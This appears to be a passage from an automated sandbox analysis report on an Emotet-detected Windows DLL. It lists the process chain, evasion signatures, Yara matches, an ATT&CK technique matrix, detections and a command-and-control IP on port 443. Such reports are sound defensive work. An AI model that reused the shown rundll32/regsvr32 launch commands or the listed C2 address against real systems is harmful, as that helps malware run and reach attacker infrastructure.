                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180016D3C6_2_0000000180016D3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001F9446_2_000000018001F944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001D9506_2_000000018001D950
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800131506_2_0000000180013150
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001ED506_2_000000018001ED50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001E9606_2_000000018001E960
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180019D606_2_0000000180019D60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001C9646_2_000000018001C964
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001C5686_2_000000018001C568
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180001D686_2_0000000180001D68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180002D706_2_0000000180002D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800245746_2_0000000180024574
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800021786_2_0000000180002178
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180024D806_2_0000000180024D80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800185986_2_0000000180018598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800035986_2_0000000180003598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001F1A46_2_000000018001F1A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002A9A86_2_000000018002A9A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800119A86_2_00000001800119A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180025DAC6_2_0000000180025DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180018DAC6_2_0000000180018DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800269B06_2_00000001800269B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800059B86_2_00000001800059B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800029BC6_2_00000001800029BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800141C06_2_00000001800141C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800125C46_2_00000001800125C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800121CC6_2_00000001800121CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000BDD06_2_000000018000BDD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800075D46_2_00000001800075D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800095DC6_2_00000001800095DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000F9E86_2_000000018000F9E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800026106_2_0000000180002610
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800196186_2_0000000180019618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001FA386_2_000000018001FA38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000A2706_2_000000018000A270
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180019E786_2_0000000180019E78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001DA806_2_000000018001DA80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800246986_2_0000000180024698
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800176B86_2_00000001800176B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001AAB86_2_000000018001AAB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002CAD06_2_000000018002CAD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180011AD06_2_0000000180011AD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180008AD86_2_0000000180008AD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800296EC6_2_00000001800296EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000A6EC6_2_000000018000A6EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800193006_2_0000000180019300
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001BB046_2_000000018001BB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002870C6_2_000000018002870C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000131C6_2_000000018000131C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000671C6_2_000000018000671C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180029B286_2_0000000180029B28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180012F286_2_0000000180012F28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000BB286_2_000000018000BB28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001EB306_2_000000018001EB30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800203346_2_0000000180020334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800107586_2_0000000180010758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001435C6_2_000000018001435C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180009F5C6_2_0000000180009F5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800293686_2_0000000180029368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800207686_2_0000000180020768
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: r0hiaXHscs.dllVirustotal: Detection: 35%
                      Source: r0hiaXHscs.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\r0hiaXHscs.dll"
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\r0hiaXHscs.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\r0hiaXHscs.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\r0hiaXHscs.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\r0hiaXHscs.dll,DllRegisterServer
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\r0hiaXHscs.dll,DllUnregisterServer
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FxQLsR\ONbDjBVKT.dll"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\r0hiaXHscs.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\r0hiaXHscs.dllJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\r0hiaXHscs.dll,DllRegisterServerJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\r0hiaXHscs.dll,DllUnregisterServerJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\r0hiaXHscs.dll",#1Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FxQLsR\ONbDjBVKT.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32Jump to behavior
                      Source: classification engineClassification label: mal76.troj.evad.winDLL@19/0@0/1
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800046A8 CreateToolhelp32Snapshot,Process32NextW,Process32FirstW,FindCloseChangeNotification,6_2_00000001800046A8
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\r0hiaXHscs.dll",#1
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: r0hiaXHscs.dllStatic PE information: Image base 0x180000000 > 0x60000000
                      Source: r0hiaXHscs.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: msacm32.pdb source: regsvr32.exe, 00000006.00000002.775197896.0000000000FB5000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: msacm32.pdbGCTL source: regsvr32.exe, 00000006.00000002.775197896.0000000000FB5000.00000004.00000010.00020000.00000000.sdmp
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AFFD push ebp; retf 2_2_000000018001AFFE
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800051D1 push ebp; iretd 2_2_00000001800051D2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BA32 push ebp; retf 2_2_000000018001BA33
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180004E83 push es; ret 2_2_0000000180004E84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001B694 push es; ret 2_2_000000018001B6E9
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BADD push ebp; iretd 2_2_000000018001BADE
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001B717 push ebp; iretd 2_2_000000018001B718
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AF4E push ebp; retf 2_2_000000018001AF4F
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001AFFD push ebp; retf 3_2_000000018001AFFE
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800051D1 push ebp; iretd 3_2_00000001800051D2
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001BA32 push ebp; retf 3_2_000000018001BA33
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180004E83 push es; ret 3_2_0000000180004E84
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001B694 push es; ret 3_2_000000018001B6E9
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001BADD push ebp; iretd 3_2_000000018001BADE
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001B717 push ebp; iretd 3_2_000000018001B718
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180007B3F push esp; retf 3_2_0000000180007B40
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001AF4E push ebp; retf 3_2_000000018001AF4F
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001AFFD push ebp; retf 4_2_000000018001AFFE
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800051D1 push ebp; iretd 4_2_00000001800051D2
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001BA32 push ebp; retf 4_2_000000018001BA33
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180004E83 push es; ret 4_2_0000000180004E84
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001B694 push es; ret 4_2_000000018001B6E9
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001BADD push ebp; iretd 4_2_000000018001BADE
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001B717 push ebp; iretd 4_2_000000018001B718
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180007B3F push esp; retf 4_2_0000000180007B40
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001AF4E push ebp; retf 4_2_000000018001AF4F
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800051D1 push ebp; iretd 6_2_00000001800051D2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180004E83 push es; ret 6_2_0000000180004E84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180007B3F push esp; retf 6_2_0000000180007B40
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFF21BBD0B8 LoadLibraryA,GetProcAddress,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_00007FFF21BBD0B8
                      Source: r0hiaXHscs.dllStatic PE information: real checksum: 0x85ab6 should be: 0x8a681
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\r0hiaXHscs.dll
                      Source: C:\Windows\System32\regsvr32.exePE file moved: C:\Windows\System32\FxQLsR\ONbDjBVKT.dllJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\FxQLsR\ONbDjBVKT.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\system32\ZBoJvStPyVWgD\wZOvGUm.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\system32\NuCIihAKPg\VLCtEbrCMLj.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6040Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-10019
                      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                      Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000D26C FindFirstFileW,FindNextFileW,FindClose,6_2_000000018000D26C
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_2-10021
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: rundll32.exe, 00000003.00000002.395701658.000002165C728000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m
                      Source: regsvr32.exe, 00000006.00000003.467319252.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.775356330.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.467252605.000000000141C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.467211849.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.775407790.000000000141C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.766213350.000001F25D2ED000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.766049645.000001F25D270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 0000000A.00000002.775524670.000001E32AE02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                      Source: regsvr32.exe, 00000006.00000003.467252605.000000000141C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.775407790.000000000141C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW"
                      Source: svchost.exe, 0000000A.00000002.775557625.000001E32AE28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFF21BB6550 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFF21BB6550
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFF21BBD0B8 LoadLibraryA,GetProcAddress,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_00007FFF21BBD0B8
                      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                      Source: C:\Windows\System32\loaddll64.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFF21BB6550 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFF21BB6550
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFF21BB20E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFF21BB20E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFF21BBD318 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFF21BBD318

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 23.239.0.12 443Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\r0hiaXHscs.dll",#1Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,2_2_00007FFF21BBE1E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,2_2_00007FFF21BBC16C
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,_itow_s,2_2_00007FFF21BBC934
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,2_2_00007FFF21BBC8C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,2_2_00007FFF21BBC834
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,2_2_00007FFF21BBC450
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,2_2_00007FFF21BBC7F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,free,GetLocaleInfoA,2_2_00007FFF21BBDF98
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,2_2_00007FFF21BBC39C
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,2_2_00007FFF21BBDF20
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,2_2_00007FFF21BBDF3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,2_2_00007FFF21BBC6E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,2_2_00007FFF21BBC2B4
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFF21BB4558 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_00007FFF21BB4558
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFF21BBE6C0 _lock,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_00007FFF21BBE6C0

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 4.2.rundll32.exe.13444f90000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.2165c820000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.5a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.2c40000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.13444f90000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.2c40000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.2165c820000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.5a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.776811676.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.398034910.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.775504614.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.399182634.0000013444F90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.395798586.000002165C820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.401159904.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts2
                      Native API
                      1
                      DLL Side-Loading
                      111
                      Process Injection
                      2
                      Masquerading
                      OS Credential Dumping2
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      Exfiltration Over Other Network Medium11
                      Encrypted Channel
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading
                      2
                      Virtualization/Sandbox Evasion
                      LSASS Memory21
                      Security Software Discovery
                      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
                      Ingress Tool Transfer
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)111
                      Process Injection
                      Security Account Manager2
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                      Non-Application Layer Protocol
                      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      Hidden Files and Directories
                      NTDS2
                      Process Discovery
                      Distributed Component Object ModelInput CaptureScheduled Transfer2
                      Application Layer Protocol
                      SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Obfuscated Files or Information
                      LSA Secrets1
                      Remote System Discovery
                      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common1
                      Regsvr32
                      Cached Domain Credentials2
                      File and Directory Discovery
                      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      Rundll32
                      DCSync24
                      System Information Discovery
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading
                      Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                      File Deletion
                      /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 626489 Sample: r0hiaXHscs.dll Startdate: 14/05/2022 Architecture: WINDOWS Score: 76 32 Antivirus detection for URL or domain 2->32 34 Multi AV Scanner detection for submitted file 2->34 36 Yara detected Emotet 2->36 7 loaddll64.exe 1 2->7         started        9 svchost.exe 2->9         started        11 svchost.exe 1 2->11         started        13 4 other processes 2->13 process3 process4 15 regsvr32.exe 5 7->15         started        18 cmd.exe 1 7->18         started        20 rundll32.exe 2 7->20         started        22 rundll32.exe 7->22         started        signatures5 42 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->42 24 regsvr32.exe 15->24         started        28 rundll32.exe 2 18->28         started        process6 dnsIp7 30 23.239.0.12, 443, 49772 LINODE-APLinodeLLCUS United States 24->30 38 System process connects to network (likely due to code injection or exploit) 24->38 40 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->40 signatures8

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      r0hiaXHscs.dll35%VirustotalBrowse
                      No Antivirus matches
                      SourceDetectionScannerLabelLinkDownload
                      6.2.regsvr32.exe.2c40000.1.unpack100%AviraHEUR/AGEN.1215493Download File
                      3.2.rundll32.exe.2165c820000.1.unpack100%AviraHEUR/AGEN.1215493Download File
                      2.2.regsvr32.exe.5a0000.0.unpack100%AviraHEUR/AGEN.1215493Download File
                      4.2.rundll32.exe.13444f90000.1.unpack100%AviraHEUR/AGEN.1215493Download File
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                      https://www.pango.co/privacy0%URL Reputationsafe
